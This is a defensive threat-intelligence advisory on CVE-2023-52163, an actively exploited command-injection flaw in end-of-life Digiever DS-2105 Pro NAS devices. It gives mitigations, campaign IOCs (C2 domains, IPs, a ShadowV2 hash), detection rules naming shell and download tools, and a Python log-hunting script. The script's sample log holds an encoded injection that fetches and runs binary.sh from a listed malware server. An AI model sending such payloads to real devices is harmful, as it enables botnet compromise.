CVE-2023-52163 Exploitation added to KEV list December 22, 2025
BLUF
CISA added a missing authorization vulnerability in Digiever DS-2105 Pro network-attached storage (NAS) devices to its KEV catalog on December 22, 2025, citing evidence of active in-the-wild exploitation. The flaw lets a remote attacker holding a low-privilege account on the device inject operating-system commands through the time_tzsetup.cgi script. The product is end-of-life, so no vendor patch is available.
Executive Cost Summary
This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.
For organizations affected by CVE-2023-52163 exploitation or suspected abuse:
Low-end total cost: $400,000 – $600,000
(Rapid isolation, limited device exposure, no secondary access detected)
Typical expected range: $700,000 – $1.2M
(Active exploitation confirmed, accelerated hardware replacement, compliance follow-up)
Upper-bound realistic scenarios: $1.3M – $1.8M
(Multiple internet-exposed devices, extended investigation, insurance friction, operational disruption)
Key cost driver:
This vulnerability is dangerous not because it causes immediate outages, but because it exposes unsupported, internet-reachable infrastructure that cannot be reliably remediated. Costs are driven less by recovery of the affected device and more by containment, validation, and governance response once leadership must attest to the security posture of end-of-life systems under active exploitation.
Potential Affected Sectors
Any organization operating Digiever DS-2105 Pro devices. The product is a storage and surveillance recording appliance, so exposure is most likely in commercial and industrial video-surveillance deployments and potentially in public-sector facilities.
Potential Affected Countries
· Global
Date of First Reported Activity
· Added to the KEV list: December 22, 2025
Date of Last Reported Activity Update
· December 23, 2025.
CVE-2023-52163
CVSS v3.1
· (8.8) AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Nessus ID
· No Tenable plugin ID is available for CVE-2023-52163
Is this on the KEV list
Yes
What is the CISA patch by date for CVE-2023-52163?
· January 12, 2026
Patch release date
· There is no official patch
Mitigation Data
Recommended Mitigation Suggestions
· Isolate and Segment the Device: Immediately isolate the affected device from untrusted networks. Implement strict network segmentation so that a compromised device cannot be used for lateral movement into the rest of the environment.
· Restrict Access: Restrict access to the device's management interface to trusted administrators only. Do not expose the device to the public internet.
· Disable or Block the Vulnerable Endpoint: If possible, disable or restrict access to the time_tzsetup.cgi web interface endpoint. Alternatively, use a web application firewall (WAF) or intrusion prevention system (IPS) to block HTTP requests targeting this specific endpoint.
· Replace End-of-Life (EOL) Equipment: The most effective long-term solution is to replace the unsupported Digiever DS-2105 Pro with a currently maintained and patched alternative. Establish a hardware lifecycle management policy to ensure devices are replaced before they reach EOL.
· Enforce Strong Authentication: Ensure strong, unique passwords are used for all accounts on the device. Exploitation requires an authenticated session (the CVSS vector records PR:L), so a default, shared, or previously leaked credential removes the only barrier to command execution.
· Monitor Network Traffic: Continuously monitor network traffic and device logs for any unusual command execution patterns or unauthorized access attempts. Deploy IPS signatures to detect exploitation attempts.
APT Names
CVE-2023-52163 is not directly tied to a specific APT group. It has been reported in campaigns associated with the following names, which different vendors use for the same Salt Typhoon activity cluster:
· Salt Typhoon
· Operator Panda
· Red Mike
· UNC5807
· Ghost Emperor
Associated Criminal Organization Names
CVE-2023-52163 has been used in ransomware campaigns, but it has not been tied to a specific criminal organization.
IOCs
As a reminder, most campaigns use dynamic indicators.
The indicators below may appear in historical data, but behavioural (heuristic) detections are the more reliable signal.
Domains
· silverpath.shadowstresser.info (C2 server domain)
· shadow.aurozacloud.xyz (C2 server domain)
IP Addresses
· 81.88.18.108 (C2 server IP address)
· 198.199.72.27 (Malware distribution server IP address)
File Hashes (SHA-256)
7dfbf8cea45380cf936ffdac18c15ad91996d61add606684b0c30625c471ce6a
(ShadowV2 binary)
Network Artifacts
· Downloader Script Name: binary.sh
Malware Identification String
· "ShadowV2 Build v1.0.0 IoT version"
Vulnerable File Path
· time_tzsetup.cgi
Vulnerable Product
· Digiever DS-2105 Pro (End-of-Life/Unsupported)
Tools Used in Campaign
RondoDox Botnet
RondoDox is the main campaign associated with exploiting CVE-2023-52163. The botnet targets a wide range of internet-exposed devices, including routers, DVRs, NVRs, CCTV systems, and web servers.
"Exploit Shotgun" Strategy
The RondoDox campaign does not rely on a single exploit; it fires exploits for more than 50 vulnerabilities at each target simultaneously to maximize infection rates.
Automated Exploitation
The RondoDox campaign relies on automated scanning and exploitation scripts that locate Digiever devices and attempt the command injection without human-directed targeting.
TTPs
· T1059.004 Command and Scripting Interpreter: Unix Shell
o This vulnerability allows for the injection of arbitrary system commands through the time_tzsetup.cgi web interface endpoint, which are then executed by a Unix shell on the underlying system.
· T1210 Exploitation of Remote Services
o The vulnerability is exploited over the network without user interaction (UI:N), though the request must carry valid low-privilege credentials (PR:L). For an internet-exposed device the closer Initial Access technique is T1190 Exploit Public-Facing Application; T1210 describes the same exploit used from inside the network to reach a segmented device.
· T1574 Hijack Execution Flow
o A loose fit: the injected command changes what the CGI script executes, but command injection is already covered by T1059.004 above, so treat this mapping as secondary.
· TA0001 Initial Access
o The exploitation of this network-accessible vulnerability provides the initial foothold on the device.
· TA0002 Execution
o The primary impact is arbitrary command execution on the affected system as the web server user, which on this class of appliance typically runs with high (root) privileges.
Malware Names
· No malware family is specific to this CVE. The exploit is bundled into botnet loaders such as RondoDox and ShadowV2 (see IOCs and Tools Used in Campaign above), which use it alongside many other device exploits.
Suggested rules / potential hunts
Please keep in mind that these are indicator rules and are likely to be noisy.
For best results
Potential Suricata Rule
(Network Detection)
This rule alerts on HTTP POST requests to the vulnerable CGI script whose body contains common command-injection characters, either raw or percent-encoded. The pcre "P" flag scopes the match to the HTTP client body, so a payload carried in a GET query string will not trigger it; if the device accepts the parameters via GET, add a second rule with the same pattern scoped to http_uri.
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Digiever DS-2105 Pro Command Injection Attempt (CVE-2023-52163)"; flow:established,to_server; content:"POST"; http_method; content:"/time_tzsetup.cgi"; http_uri; pcre:"/(?:;|\||`|\$\()|(?:\%3b|\%7c|\%60|\%24\%28)/Pi"; classtype:attempted-admin; sid:202352163; rev:1;)
Actionable Step: Load this into your Suricata rule set. If the management interface is served over TLS, Suricata cannot match on the encrypted stream; terminate TLS at a reverse proxy such as Nginx in front of the device and inspect the plaintext leg.
Potential SentinelOne Rules
SentinelOne (Endpoint Hunting)
· Although this is a network-side vulnerability, successful exploitation spawns a shell process under the web server user (root on most embedded devices, www-data on general-purpose Linux). An EDR agent cannot be installed on the appliance itself, so run this query on Linux hosts that do carry the agent and serve CGI scripts, where the same parent/child pattern would appear.
ProcessName In ("sh", "bash", "nc", "wget", "curl") AND (ParentProcessName Contains "httpd" OR ParentProcessName Contains ".cgi")
· Deep Visibility: Run this query in the SentinelOne Deep Visibility pane to hunt for command execution or follow-on lateral movement initiated by the web service.
Potential Splunk Hunts
Search web server or reverse-proxy access logs for requests to the vulnerable URI whose query string or body contains shell metacharacters after URL decoding, then summarize by source. The query-string field follows the Splunk CIM Web model; whether a request-body field such as payload exists depends on the log source.
index=web sourcetype=access_* uri_path="*/time_tzsetup.cgi*"
| eval payload=coalesce(uri_query, payload, "")
| where match(urldecode(payload), "[;\|`\$]")
| stats count by src_ip, uri_path, status, user_agent
| sort - count
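The Suricata rule and the Splunk search above apply the same test: a request to time_tzsetup.cgi whose parameters carry shell metacharacters once URL-decoded. The following Python script is a worked example added here; it is not part of the original advisory and is not code from CISA, Akamai, Fortinet or Digiever. It runs that logic offline over an exported access log, decodes repeatedly so double-encoded payloads are caught, and inspects the query string as well as the POST body. It assumes a combined-format log with the request body appended as an extra quoted field (available when a reverse proxy in front of the device logs $request_body); the sample lines are constructed, not captured traffic, and the /cgi-bin/ prefix on the script path is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote

VULN_PATH = "/time_tzsetup.cgi"

# Characters that terminate or substitute a command in a POSIX shell.  The
# Suricata rule and Splunk search in the advisory look for the same set.
SHELL_META = re.compile(r"[;|`\n]|\$\(")

# Combined log format with one optional trailing quoted field for the request
# body (assumption: a reverse proxy in front of the device logs it).
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
    r'(?: "(?P<body>[^"]*)")?'
)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable so %253B (double-encoded ';') is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def injected_params(form: str) -> list:
    """Return (name, decoded value) pairs whose value carries shell metacharacters."""
    hits = []
    for name, value in parse_qsl(form, keep_blank_values=True):
        value = decode_fully(value)
        if SHELL_META.search(value):
            hits.append((name, value))
    return hits


def analyze(line: str):
    """Classify one access-log line; None means not a request to the vulnerable CGI."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    path, _, query = m.group("uri").partition("?")
    if not path.endswith(VULN_PATH):
        return None
    # Unlike the Suricata rule, inspect the query string too, not only the POST body.
    hits = injected_params(query) + injected_params(m.group("body") or "")
    return {
        "src": m.group("src"),
        "method": m.group("method"),
        "status": int(m.group("status")),
        "suspicious": bool(hits),
        "params": hits,
    }


def hunt(lines):
    """Return the analyzed records for every suspicious request in the log."""
    return [r for r in map(analyze, lines) if r and r["suspicious"]]


# Constructed sample lines (not captured traffic).  The downloader IP and script
# name reuse the advisory's IOCs for illustration only.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Dec/2025:10:01:00 +0000] "POST /cgi-bin/time_tzsetup.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0" "tz=UTC&ntp=pool.ntp.org"',
    '203.0.113.9 - - [22/Dec/2025:10:02:13 +0000] "POST /cgi-bin/time_tzsetup.cgi HTTP/1.1" 200 512 "-" "curl/7.88" "tz=UTC%3Bwget+http%3A%2F%2F198.199.72.27%2Fbinary.sh+-O+%2Ftmp%2Fb%3Bsh+%2Ftmp%2Fb"',
    '203.0.113.9 - - [22/Dec/2025:10:02:14 +0000] "GET /cgi-bin/time_tzsetup.cgi?tz=UTC%2560id%2560 HTTP/1.1" 200 512 "-" "curl/7.88"',
    '10.0.0.7 - - [22/Dec/2025:10:03:00 +0000] "GET /cgi-bin/index.cgi?tz=%3B HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for r in hunt(SAMPLE_LOG):
        print(r["src"], r["method"], r["status"], r["params"])
```

The second sample line is the shape RondoDox-style loaders produce (inject, fetch a downloader script, run it); the third shows why a single URL-decode is not enough, since the backticks only appear after the second pass. Benign time-zone updates pass untouched because parse_qsl splits on the & separator before the metacharacter check runs.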
Delivery Method
· Network exploitation of the vulnerable web interface.
Email Samples
· Not applicable
References
CISA
hxxps://www.cisa.gov/news-events/alerts/2025/12/22/cisa-adds-one-known-exploited-vulnerability-catalog
hxxps://www.cisa.gov/known-exploited-vulnerabilities-catalog
NVD
hxxps://nvd.nist.gov/vuln/detail/CVE-2023-52163
Akamai
hxxps://www.akamai.com/blog/security-research/digiever-fix-that-iot-thing
TXOne
hxxps://www.txone.com/blog/digiever-fixes-sorely-needed/
FortiGuard
hxxps://www.fortinet.com/lat/blog/threat-research/shadowv2-casts-a-shadow-over-iot-devices
Check Point
hxxps://advisories.checkpoint.com/defense/advisories/public/2025/cpai-2023-2059.html
RedHat
hxxps://access.redhat.com/security/cve/cve-2023-52163